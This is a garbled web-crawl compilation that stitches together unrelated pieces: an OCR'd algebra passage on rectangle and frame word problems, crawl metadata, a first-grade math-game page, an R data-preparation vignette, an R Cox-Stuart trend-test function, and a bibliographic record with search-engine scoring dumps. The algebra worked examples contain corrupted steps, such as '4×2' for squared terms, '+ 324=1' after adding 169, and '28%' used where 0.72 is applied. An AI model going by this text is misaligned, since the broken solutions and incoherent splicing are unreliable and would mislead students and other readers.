=x +7\n\nx + 7 Area is 33more than original, x(x +4) + 33\n\n(x +3)(x + 7)=x(x + 4) + 33 Set up equation, length timeswidth is area\n\nx2 + 10x + 21=x2 + 4x + 33 Subtract x2 fromboth sides\n\n−x2 −x2 10x + 21= 4x + 33 Move variables to one side\n\n− 4x − 4x Subtract 4x from each side 6x + 21= 33 Subtract 21 fromboth sides\n\n− 21− 21 6x = 12 Divide both sides by 6\n\n6 6\n\nx =2 x is thewidth of the original\n\n(2)+ 4=6 x +4 is the length. Substitute 2 to find\n\n2 ft by 6ft Our Solution\n\nFrom one rectangle we can find two equations. Perimeter is found by adding all the sides of a polygon together. A rectangle has two widths and two lengths, both the same size. So we can use the equation P = 2l + 2w (twice the length plus twice the width).\n\nExample 487.\n\nThe area of a rectangle is 168 cm2. The perimeter of the same rectangle is 52 cm. What are the dimensions of the rectangle?\n\nx Wedon ′t know anything about length orwidth\n\ny Use two variables, x and y\n\nxy = 168 Length timeswidth gives the area.\n\n2x +2y = 52 Also use perimeter formula.\n\n− 2x − 2x Solve by substitution, isolate y 2y =− 2x + 52 Divide each termby 2\n\n359\n\n2 2 2\n\ny =−x + 26 Substitute into area equation x(−x + 26)= 168 Distribute −x2 + 26x = 168 Divide each termby− 1, changing all the signs x2− 26x =− 168 Solve by completing the square.\n\n(\n\n1\n\n2 · 26 )2\n\n= 132 = 169 Find number to complete the square:\n\n(\n\n1\n\n2 · b )2\n\nx2− 26x + 324=1 Add 169 to both sides (x− 13)2 =1 Factor x− 13=± 1 Square root both sides\n\n+ 13 + 13\n\nx = 13± 1 Evaluate x = 14 or 12 Two options for first side.\n\ny =− (14)+ 26= 12 Substitute 14 into y =− x + 26 y =− (12)+ 26= 14 Substitute 12 into y =− x + 26\n\nBoth are the same rectangle, variables switched!\n\n12 cmby 14cm Our Solution\n\nWorld View Note: Indian mathematical records from the 9th century demon- strate that their civilization had worked extensivly in geometry creating religious alters of various shapes including rectangles.\n\nAnother type of rectangle problem is what we will call a “frame problem”. The idea behind a frame problem is that a rectangle, such as a photograph, is centered inside another rectangle, such as a frame. In these cases it will be important to rememember that the frame extends on all sides of the rectangle. This is shown in the following example.\n\nExample 488.\n\nAn 8 in by 12 in picture has a frame of uniform width around it. The area of the frame is equal to the area of the picture. What is the width of the frame?\n\n8\n\n12 12+2x Drawpicture, picture if 8by 10 If frame haswidthx, on both sides,weadd 2x\n\n8+ 2x\n\n8 · 12= 96 Area of the picture, length timeswidth 2 · 96= 192 Frameisthesameasthepicture.Totalarea isdoublethis.\n\n(12+2x)(8+ 2x) = 192 Area of everything, length timeswidth\n\n96+ 24x + 16x +4×2 = 192 FOIL\n\n4×2 + 40x + 96= 192 Combine like terms\n\n− 192− 192 Make equation equal to zero by subtracting 192 4×2 + 40x− 96=0 Factor outGCF of 4\n\n360\n\n4(x2 + 10x− 24) = 0 Factor trinomial 4(x− 2)(x + 12) = 0 Set each factor equal to zero\n\nx− 2= 0 or x + 12=0 Solve each equation +2+ 2 − 12− 12\n\nx= 2 or − 12 Can ′t have negative framewidth. 2 inches Our Solution\n\nExample 489.\n\nA farmer has a field that is 400 rods by 200 rods. He is mowing the field in a spiral pattern, starting from the outside and working in towards the center. After an hour of work, 72% of the field is left uncut. What is the size of the ring cut around the outside?\n\n400− 2x\n\n200− 2x 200 Drawpicture, outside is 200 by 400 If frame haswidthx on both sides, subtract 2x from each side to get center\n\n400\n\n400 · 200= 80000 Area of entire field, length timeswidth 80000 · (0.72) = 57600 Area of center,multiply by 28% as decimal\n\n(400− 2x)(200− 2x) = 57600 Area of center, length timeswidth 80000− 800x− 400x +4×2 = 57600 FOIL\n\n4×2− 1200x + 80000= 57600 Combine like terms − 57600− 57600 Make equation equal zero\n\n4×2− 1200x + 22400=0 Factor outGCFof 4 4(x2− 300x + 5600) = 0 Factor trinomial 4(x− 280)(x− 20) = 0 Set each factor equal to zero\n\nx− 280= 0 or x− 20=0 Solve each equation + 280+ 280 + 20+ 20\n\nx = 280 or 20 The field is only 200 rodswide,\n\nCan ′t cut 280 off two sides!\n\n20 rods Our Solution\n\nFor each of the frame problems above we could have also completed the square or use the quadratic formula to solve the trinomials. Remember that completing the square or the quadratic formula always will work when solving, however, factoring only works if we can factor the trinomial.\n\n361\n\n9.7 Practice – Rectangles\n\n1) In a landscape plan, a rectangular flowerbed is designed to be 4 meters longer than it is wide. If 60 square meters are needed for the plants in the bed, what should the dimensions of the rectangular bed be?\n\n2) If the side of a square is increased by 5 the area is multiplied by 4. Find the side of the original square.\n\n3) A rectangular lot is 20 yards longer than it is wide and its area is 2400 square yards. Find the dimensions of the lot.\n\n4) The length of a room is 8 ft greater than it is width. If each dimension is increased by 2 ft, the area will be increased by 60 sq. ft. Find the dimensions of the rooms.\n\n5) The length of a rectangular lot is 4 rods greater than its width, and its area is 60 square rods. Find the dimensions of the lot.\n\n6) The length of a rectangle is 15 ft greater than its width. If each dimension is decreased by 2 ft, the area will be decreased by 106 ft2. Find the dimensions.\n\n7) A rectangular piece of paper is twice as long as a square piece and 3 inches wider. The area of the rectangular piece is 108 in2. Find the dimensions of the square piece.\n\n8) A room is one yard longer than it is wide. At 75c per sq. yd. a covering for the floor costs S31.50. Find the dimensions of the floor.\n\n9) The area of a rectangle is 48 ft2 and its perimeter is 32 ft. Find its length and width.\n\n10) The dimensions of a picture inside a frame of uniform width are 12 by 16 inches. If the whole area (picture and frame) is 288 in2, what is the width of the frame?\n\n11) A mirror 14 inches by 15 inches has a frame of uniform width. If the area of the frame equals that of the mirror, what is the width of the frame.\n\n12) A lawn is 60 ft by 80 ft. How wide a strip must be cut around it when mowing the grass to have cut half of it.\n\n13) A grass plot 9 yards long and 6 yards wide has a path of uniform width around it. If the area of the path is equal to the area of the plot, determine the width of the path.\n\n14) A landscape architect is designing a rectangular flowerbed to be border with 28 plants that are placed 1 meter apart. He needs an inner rectangular space in the center for plants that must be 1 meter from the border of the bed and\n\n362\n\nthat require 24 square meters for planting. What should the overall dimensions of the flowerbed be?\n\n15) A page is to have a margin of 1 inch, and is to contain 35 in2 of painting. How large must the page be if the length is to exceed the width by 2 inches?\n\n16) A picture 10 inches long by 8 inches wide has a frame whose area is one half the area of the picture. What are the outside dimensions of the frame?\n\n17) A rectangular wheat field is 80 rods long by 60 rods wide. A strip of uniform width is cut around the field, so that half the grain is left standing in the form of a rectangular plot. How wide is the strip that is cut?\n\n18) A picture 8 inches by 12 inches is placed in a frame of uniform width. If the area of the frame equals the area of the picture find the width of the frame.\n\n19) A rectangular field 225 ft by 120 ft has a ring of uniform width cut around the outside edge. The ring leaves 65% of the field uncut in the center. What is the width of the ring?\n\n20) One Saturday morning George goes out to cut his lot that is 100 ft by 120 ft. He starts cutting around the outside boundary spiraling around towards the center. By noon he has cut 60% of the lawn. What is the width of the ring that he has cut?\n\n21) A frame is 15 in by 25 in and is of uniform width. The inside of the frame leaves 75% of the total area available for the picture. What is the width of the frame?\n\n22) A farmer has a field 180 ft by 240 ft. He wants to increase the area of the field by 50% by cultivating a band of uniform width around the outside. How wide a band should he cultivate?\n\n23) The farmer in the previous problem has a neighber who has a field 325 ft by 420 ft. His neighbor wants to increase the size of his field by 20% by cultivating a band of uniform width around the outside of his lot. How wide a band should his neighbor cultivate?\n\n24) A third farmer has a field that is 500 ft by 550 ft. He wants to increase his field by 20%. How wide a ring should he cultivate around the outside of his field?\n\n25) Donna has a garden that is 30 ft by 36 ft. She wants to increase the size of the garden by 40%. How wide a ring around the outside should she cultivate?\n\n26) A picture is 12 in by 25 in and is surrounded by a frame of uniform width. The area of the frame is 30% of the area of the picture. How wide is the frame?\n\n363\n\n• 9.2 Quadratics – Solving with Exponents\n• 9.3 Quadratics – Complete the Square\nBasic features\n• Free title page and bibliography\n• Unlimited revisions\n• Plagiarism-free guarantee\n• Money-back guarantee" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7878086,"math_prob":0.99984515,"size":46152,"snap":"2022-27-2022-33","text_gpt3_token_len":17991,"char_repetition_ratio":0.160527,"word_repetition_ratio":0.07908015,"special_character_ratio":0.41298318,"punctuation_ratio":0.058876093,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998988,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-16T21:58:00Z\",\"WARC-Record-ID\":\"<urn:uuid:b0500e72-fb6c-41aa-828d-d456222a876c>\",\"Content-Length\":\"94654\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8e02bade-146b-4f39-9f7a-54368100443a>\",\"WARC-Concurrent-To\":\"<urn:uuid:857c5631-bbe0-40e9-bb8f-588da5972d7e>\",\"WARC-IP-Address\":\"162.213.255.108\",\"WARC-Target-URI\":\"https://gishomework.com/one-algebra-problem/\",\"WARC-Payload-Digest\":\"sha1:XSTXSIHG557KNXGQHBOGX3KDQMRQ3XVX\",\"WARC-Block-Digest\":\"sha1:XVGKP3MRWQKZXGW6DOJHS2KH4XBAPP5J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572581.94_warc_CC-MAIN-20220816211628-20220817001628-00359.warc.gz\"}"}
http://planeta42.com/math/test1grade/
[ "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "Tweet", null, "", null, "", null, "# 1st grade math online test.\n\n \"Math Test 1 Grade\" is a free online test to calculate sum of numbers from 0 to 10. Simple math test to do addition of two numbers from 0 to 10 with integarted evaluation system. Interactive math study. Fun math test, suitable for online lessons and interactive classes. Part of the Fun Interactive Mathematics educational tools. Online math test.\n\nThis math class game include the following:\n• A number from 0 to 10\n• Another number from 0 to 10\n• Sum of the numbers\n• 21 equations", null, "", null, "", null, "", null, "", null, "## How to solve Math Test 1 Grade - Addition to 10.\n\n The computer generates a simple equation to sum tow numbers from 0 to 10. Write your answer of the sum in the imput field and press Enter button. If the sum is correct a happy sound plays and one cube of the colorful pyramid to the right is put in place. If the sum is incorrect a sad sound plays and one cube of the colorful pyramid is removed from place. Then another random eqations is generated and so forth 21 times. Aftrer the test is done, you get your school mark in math for 1st grade.\n\nKnowledge Achievements:\nKnow addition of numbers from 0 - 10 and get +1 Knowledge Level.\nDifficulty: Super Easy.", null, "", null, "", null, "", null, "", null, "### Class subject: 1 Grade Math.\n\n In math, students may learn about addition and subtraction of natural numbers, usually with only one digit, and about measurement. Basic geometry and graphing may be introduced. Clock and calendar time as well as money may also be in the curriculum.\n\nThis fun math game may answer the following questions:\n• What is the sum of numbers of 0 to 10?\n• What is the sum of 5+7?\n• What is the sum of 3+4?", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "Labels: , , , ,\nPlaneta 42 Game World | About | Sitemap | Levels | Downloads | News | Free Games | Drawings | Best Games Ever" ]
[ null, "http://planeta42.com/categories/LogicGames.gif", null, "http://planeta42.com/math/headerMathGames.jpg", null, "http://planeta42.com/categories/GeographyGames.gif", null, "http://planeta42.com/pics/sitemapicons/astronomyIcon.png", null, "http://planeta42.com/pics/sitemapicons/biologyIcon.png", null, "http://planeta42.com/pics/sitemapicons/geographyIcon.png", null, "http://planeta42.com/pics/sitemapicons/mathIcon1.png", null, "http://planeta42.com/pics/sitemapicons/chemistryIcon.png", null, "http://planeta42.com/pics/sitemapicons/itIcon.png", null, "http://planeta42.com/pics/sitemapicons/physicsIcon.png", null, "http://planeta42.com/pics/sitemapicons/languageIcon.png", null, "http://planeta42.com/pics/sitemapicons/artsIcon.png", null, "http://planeta42.com/pics/sitemapicons/archeologyIcon.png", null, "http://assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png", null, "http://planeta42.com/pics/r4x4ul.gif", null, "http://planeta42.com/pics/r4x4ur.gif", null, "http://planeta42.com/math/test1grade/p42.test1grade.jpg", null, "http://planeta42.com/pics/r4x4.gif", null, "http://planeta42.com/pics/r4x4dr.gif", null, "http://planeta42.com/pics/r4x4ul.gif", null, "http://planeta42.com/pics/r4x4ur.gif", null, "http://planeta42.com/math/test1grade/test1grade.Screenshot.jpg", null, "http://planeta42.com/pics/r4x4.gif", null, "http://planeta42.com/pics/r4x4dr.gif", null, "http://planeta42.com/pics/r4x4ul.gif", null, "http://planeta42.com/pics/r4x4ur.gif", null, "http://planeta42.com/pics/r4x4.gif", null, "http://planeta42.com/pics/r4x4dr.gif", null, "http://planeta42.com/pics/sitemapicons/psychologyIcon.png", null, "http://planeta42.com/pics/sitemapicons/historyIcon.png", null, "http://planeta42.com/pics/sitemapicons/financesIcon1.png", null, "http://planeta42.com/pics/sitemapicons/cookingIcon.png", null, "http://planeta42.com/pics/sitemapicons/logicIcon1.png", null, "http://planeta42.com/pics/sitemapicons/sportsIcon.png", null, "http://planeta42.com/pics/sitemapicons/dayCelebrateIcon.png", null, "http://planeta42.com/pics/sitemapicons/natureIcon.png", null, "http://planeta42.com/pics/sitemapicons/mopuzIcon.png", null, "http://planeta42.com/pics/sitemapicons/gamesIcon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90009254,"math_prob":0.92812306,"size":1464,"snap":"2019-13-2019-22","text_gpt3_token_len":327,"char_repetition_ratio":0.13219178,"word_repetition_ratio":0.053639848,"special_character_ratio":0.22336066,"punctuation_ratio":0.09931507,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9934558,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-05-26T05:42:15Z\",\"WARC-Record-ID\":\"<urn:uuid:a84916f8-93cd-4264-8c69-10db498689e4>\",\"Content-Length\":\"34549\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b502f15f-e007-4794-bc6b-ca1b035377fa>\",\"WARC-Concurrent-To\":\"<urn:uuid:79d27f32-7552-465d-a174-ece781c00d70>\",\"WARC-IP-Address\":\"91.215.216.38\",\"WARC-Target-URI\":\"http://planeta42.com/math/test1grade/\",\"WARC-Payload-Digest\":\"sha1:RXP5XKWIW4UK644GQQDJHCWLBO732EDT\",\"WARC-Block-Digest\":\"sha1:5TYFYES67WU4CD2UN5B5U7L3G3WZKMGJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-22/CC-MAIN-2019-22_segments_1558232258849.89_warc_CC-MAIN-20190526045109-20190526071109-00134.warc.gz\"}"}
https://cran.rstudio.org/web/packages/MRFcov/vignettes/CRF_data_prep.html
[ "Prepping datasets for CRF models\n\nRunning CRFs with categorical covariates requires expansion to model matrix format\n\nThe mosquito occurrence data from Golding et al 2015 (published in Parasites & Vectors) available from figshare here is useful for exploring how datasets need to be prepped for running Conditional Random Fields (CRF) models. Here, we will download the raw data from figshare (note, an internet connection will be needed for this step) change ‘dipping_round’ to a factor variable and remove un-needed columns\n\ntemp <- tempfile()\ntemp)\ndataset <- read.csv(temp, as.is = T)\n\nWe can now change the categorical dipping_round and field_site variables to factors and remove some un-needed variables\n\ndataset$dipping_round <- as.factor(dataset$dipping_round)\ndataset$field_site <- as.factor(dataset$field_site)\ndataset[,c(1,2,5,6)] <- NULL\n\nIt is important here to examine the level names of factor variables, as the 1st level (i.e. the dummy level) will be dropped from the dataset during conversion to model matrix format (as in standard lme4 analysis of factor covariates)\n\nlevels(dataset$dipping_round) levels(dataset$field_site)\n\nThe next step is to convert any factor variables into model matrix format. As mentioned above, this step will drop the first level of a factor and then create an additional column for each additional level (i.e. dipping_round levels \"3\", \"5\" and \"6\" will all be assigned their own unique columns, while dipping_round level \"2\" will be dropped and treated as the reference level). It is also convenient to change names of the new covariate columns so they are easier to view and interpret (done here using dplyr::rename_all)\n\nlibrary(dplyr)\nanalysis.data = dataset %>%\ncbind(.,data.frame(model.matrix(~.[,'field_site'],\n.)[,-1])) %>%\ncbind(.,data.frame(model.matrix(~.[,'dipping_round'],\n.)[,-1])) %>%\ndplyr::select(-field_site,-dipping_round) %>%\ndplyr::rename_all(funs(gsub(\"\\\\.|model.matrix\", \"\", .)))\n\nFinally, we need to convert species abundances to binary presence-absence format (as we are only estimating co-occurrences, not co-abundances). It is also highly advisable to scale any continuous variables so they all have mean = 0 and sd = 1\n\nanalysis.data[, 1:16] <- ifelse(analysis.data[, 1:16] > 0, 1, 0)\nanalysis.data[, 17:20] <- scale(analysis.data[, 17:20], center = T, scale = T)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7824478,"math_prob":0.9386259,"size":2087,"snap":"2022-05-2022-21","text_gpt3_token_len":498,"char_repetition_ratio":0.12145943,"word_repetition_ratio":0.0,"special_character_ratio":0.24820316,"punctuation_ratio":0.15926893,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98523057,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-20T05:32:31Z\",\"WARC-Record-ID\":\"<urn:uuid:ff2d464a-f941-4a65-a980-d8ad5f8ac956>\",\"Content-Length\":\"15415\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8c781e1d-e904-4b56-988d-bb3c54f8ee76>\",\"WARC-Concurrent-To\":\"<urn:uuid:4cc8b8d8-bc2a-41c4-8032-36d8f2a87910>\",\"WARC-IP-Address\":\"18.67.65.59\",\"WARC-Target-URI\":\"https://cran.rstudio.org/web/packages/MRFcov/vignettes/CRF_data_prep.html\",\"WARC-Payload-Digest\":\"sha1:VNKVCNWTPNDDAXRWL4ULA26LR7C4FXT4\",\"WARC-Block-Digest\":\"sha1:KGUOXYAZ2AWMF7ES6KNL5VXWTCGAQRUH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320301720.45_warc_CC-MAIN-20220120035934-20220120065934-00167.warc.gz\"}"}
https://deepmarketing.io/2018/07/r-code-for-cox-stuart-test-for-trend-analysis/
[ "Currently set to No Index\n\n# R Code for Cox & Stuart Test for Trend Analysis\n\nR Code for Cox & Stuart Test for Trend Analysis\n\nBelow is an R code for Cox & Stuart Test for Trend Analysis. Simply, copy and paste the code into R workspace and use it. Unlike cox.stuart.test in R package named “randtests”, this version of the test does not return a p-value greater than one. This phenomenon occurs when the test statistic, T is half of the number of untied pairs, N. Here is a simple example that reveals the situtaion:\n> x 1 4 6 7 9 7 1 6\n> cox.stuart.test(x)\nCox Stuart test\ndata: x statistic = 2, n = 4, p-value = 1.375 alternative hypothesis: non randomness\n> o.Cox.Stuart.test(x)\nCox & Stuart Test for Trend Analysis\ndata: x Test Statistic = 2, Number of Untied Pairs = 4, p-value = 1 alternative hypothesis: any type of trend, either decreasing or increasing\nR Code for Cox & Stuart Test:\no.Cox.Stuart.test <- function(x, alternative=c(“two.sided” ,”left.sided”, “right.sided”)){\ndname <- deparse(substitute(x))\nalternative <- match.arg(alternative)\nstopifnot(is.numeric(x))\nn0 <- length(x)\nif (n0 < 2){ stop(“sample size must be greater than 1”) }\nn0 <- round(length(x)) %% 2\nif (n0 == 1) { remove <- (length(x)+1)/2 x <- x[ -remove ] }\nhalf <- length(x)/2 x1 <- x[1:half] x2 <- x[(half+1):(length(x))] n <- sum((x2-x1)!=0) t <- sum(x1<x2)\nif (alternative == “left.sided”) { p.value <- pbinom(t, n, 0.5) alternative <- “decreasing trend” }\nif (alternative == “right.sided”){ p.value <- 1-pbinom(t-1, n, 0.5) alternative <- “increasing trend” }\nif (alternative == “two.sided”){ alternative <- “any type of trend, either decreasing or increasing” if (1-pbinom(t-1, n, 0.5) == pbinom(t, n, 0.5)) { pdist <- dbinom(0:n, n, 0.5) p.value <- sum(pdist[pdist <= t+1]) } else { p.value <- 2*min( 1-pbinom(t-1, n, 0.5), pbinom(t, n, 0.5)) } }\nrval <- list(statistic=c(“Test Statistic”=t), alternative=alternative, p.value=p.value, method=”Cox & Stuart Test for Trend Analysis”, parameter=c(“Number of Untied Pairs”=n), data.name=dname)\nclass(rval) <- “htest” return(rval) }\n\nLink: R Code for Cox & Stuart Test for Trend Analysis" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54732066,"math_prob":0.9973881,"size":2095,"snap":"2019-51-2020-05","text_gpt3_token_len":678,"char_repetition_ratio":0.14777619,"word_repetition_ratio":0.09969789,"special_character_ratio":0.3431981,"punctuation_ratio":0.17841409,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995714,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T03:07:53Z\",\"WARC-Record-ID\":\"<urn:uuid:568ea7c4-bf2d-4966-884d-b11c8580265c>\",\"Content-Length\":\"44517\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bf58c296-835c-47a6-aec5-4112fc6a06c3>\",\"WARC-Concurrent-To\":\"<urn:uuid:6340ba30-4a60-44e6-8793-7018e51106ff>\",\"WARC-IP-Address\":\"148.72.96.98\",\"WARC-Target-URI\":\"https://deepmarketing.io/2018/07/r-code-for-cox-stuart-test-for-trend-analysis/\",\"WARC-Payload-Digest\":\"sha1:XHOQ6WVQGZMCXRBQ5E7YQMRNW77YX5FN\",\"WARC-Block-Digest\":\"sha1:NZJDRNQBGH7E374IKGTAKCAOP2GMM2AU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540579703.26_warc_CC-MAIN-20191214014220-20191214042220-00507.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/39680
[ "# Document (#39680)\n\nAuthor\nHendahewa, C.\nShah, C.\nTitle\nImplicit search feature based approach to assist users in exploratory search tasks\nSource\nInformation processing and management. 51(2015) no.5, S.643-661\nYear\n2015\nAbstract\nAnalyzing and modeling users' online search behaviors when conducting exploratory search tasks could be instrumental in discovering search behavior patterns that can then be leveraged to assist users in reaching their search task goals. We propose a framework for evaluating exploratory search based on implicit features and user search action sequences extracted from the transactional log data to model different aspects of exploratory search namely uncertainty, creativity, exploration, and knowledge discovery. We show the effectiveness of the proposed framework by demonstrating how it can be used to understand and evaluate user search performance and thereby make meaningful recommendations to improve the overall search performance of users. We used data collected from a user study consisting of 18 users conducting an exploratory search task for two sessions with two different topics in the experimental analysis. With this analysis we show that we can effectively model their behavior using implicit features to predict the user's future performance level with above 70% accuracy in most cases. Further, using simulations we demonstrate that our search process based recommendations improve the search performance of low performing users over time and validate these findings using both qualitative and quantitative approaches.\nContent\nVgl.: doi: 10.1016/j.ipm.2015.06.004.\nTheme\nSemantisches Umfeld in Indexierung u. Retrieval\n\n## Similar documents (author)\n\n1. Shah, C.: Collaborative information seeking : the art and science of making the whole greater than the sum of all (2012) 5.36\n```5.364876 = sum of:\n5.364876 = weight(author_txt:shah in 1825) [ClassicSimilarity], result of:\n5.364876 = score(doc=1825,freq=1.0), product of:\n0.99999994 = queryWeight, product of:\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.116498485 = queryNorm\n5.3648763 = fieldWeight in 1825, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.625 = fieldNorm(doc=1825)\n```\n2. Shah, C.: Effects of awareness on coordination in collaborative information seeking (2013) 5.36\n```5.364876 = sum of:\n5.364876 = weight(author_txt:shah in 2417) [ClassicSimilarity], result of:\n5.364876 = score(doc=2417,freq=1.0), product of:\n0.99999994 = queryWeight, product of:\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.116498485 = queryNorm\n5.3648763 = fieldWeight in 2417, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.625 = fieldNorm(doc=2417)\n```\n3. Shah, C.: Collaborative information seeking (2014) 5.36\n```5.364876 = sum of:\n5.364876 = weight(author_txt:shah in 2658) [ClassicSimilarity], result of:\n5.364876 = score(doc=2658,freq=1.0), product of:\n0.99999994 = queryWeight, product of:\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.116498485 = queryNorm\n5.3648763 = fieldWeight in 2658, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.625 = fieldNorm(doc=2658)\n```\n4. Shah, C.: Social information seeking : leveraging the wisdom of the crowd (2017) 5.36\n```5.364876 = sum of:\n5.364876 = weight(author_txt:shah in 261) [ClassicSimilarity], result of:\n5.364876 = score(doc=261,freq=1.0), product of:\n0.99999994 = queryWeight, product of:\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.116498485 = queryNorm\n5.3648763 = fieldWeight in 261, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.625 = fieldNorm(doc=261)\n```\n5. Shah, L.; Kumar, S.: Uniform form divisions (common isolates) for digital environment : a proposal (2006) 4.29\n```4.2919006 = sum of:\n4.2919006 = weight(author_txt:shah in 1102) [ClassicSimilarity], result of:\n4.2919006 = score(doc=1102,freq=1.0), product of:\n0.99999994 = queryWeight, product of:\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.116498485 = queryNorm\n4.291901 = fieldWeight in 1102, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n8.583802 = idf(docFreq=21, maxDocs=43254)\n0.5 = fieldNorm(doc=1102)\n```\n\n## Similar documents (content)\n\n1. Shah, C.; Hendahewa, C.; González-Ibáñez, R.: Rain or shine? : forecasting search process performance in exploratory search tasks (2016) 0.49\n```0.48618838 = sum of:\n0.48618838 = product of:\n1.0128925 = sum of:\n0.025760543 = weight(abstract_txt:show in 4477) [ClassicSimilarity], result of:\n0.025760543 = score(doc=4477,freq=1.0), product of:\n0.09278665 = queryWeight, product of:\n1.1745449 = boost\n4.442112 = idf(docFreq=1383, maxDocs=43254)\n0.017783873 = queryNorm\n0.277632 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.442112 = idf(docFreq=1383, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.027690178 = weight(abstract_txt:features in 4477) [ClassicSimilarity], result of:\n0.027690178 = score(doc=4477,freq=1.0), product of:\n0.0973642 = queryWeight, product of:\n1.2031687 = boost\n4.550367 = idf(docFreq=1241, maxDocs=43254)\n0.017783873 = queryNorm\n0.28439793 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.550367 = idf(docFreq=1241, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.02846271 = weight(abstract_txt:framework in 4477) [ClassicSimilarity], result of:\n0.02846271 = score(doc=4477,freq=1.0), product of:\n0.0991668 = queryWeight, product of:\n1.2142555 = boost\n4.5922966 = idf(docFreq=1190, maxDocs=43254)\n0.017783873 = queryNorm\n0.28701854 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.5922966 = idf(docFreq=1190, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.02046754 = weight(abstract_txt:based in 4477) [ClassicSimilarity], result of:\n0.02046754 = score(doc=4477,freq=2.0), product of:\n0.07231799 = queryWeight, product of:\n1.2699765 = boost\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.017783873 = queryNorm\n0.28302142 = fieldWeight in 4477, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.2020218 = idf(docFreq=4782, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.03510609 = weight(abstract_txt:task in 4477) [ClassicSimilarity], result of:\n0.03510609 = score(doc=4477,freq=1.0), product of:\n0.11405223 = queryWeight, product of:\n1.3022033 = boost\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.017783873 = queryNorm\n0.30780712 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.924914 = idf(docFreq=853, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.041346204 = weight(abstract_txt:tasks in 4477) [ClassicSimilarity], result of:\n0.041346204 = score(doc=4477,freq=1.0), product of:\n0.12719575 = queryWeight, product of:\n1.3751916 = boost\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.017783873 = queryNorm\n0.32505965 = fieldWeight in 4477, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.2009544 = idf(docFreq=647, maxDocs=43254)\n0.0625 = fieldNorm(doc=4477)\n0.03104942 = weight(abstract_txt:user in 4477) [ClassicSimilarity], result of:\n0.03104942 